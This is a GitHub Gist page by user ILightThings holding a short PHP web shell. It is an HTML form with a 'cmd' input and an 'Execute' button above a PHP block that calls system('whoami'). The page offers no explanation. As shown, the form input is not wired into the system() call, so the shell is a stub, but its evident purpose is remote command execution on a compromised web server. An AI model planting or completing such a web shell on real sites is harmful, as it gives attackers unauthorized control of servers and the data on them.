Skip to content

Instantly share code, notes, and snippets.

View ILightThings's full-sized avatar
🏠
Working from home

iLightThings ILightThings

🏠
Working from home
View GitHub Profile
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
system('whoami');
?>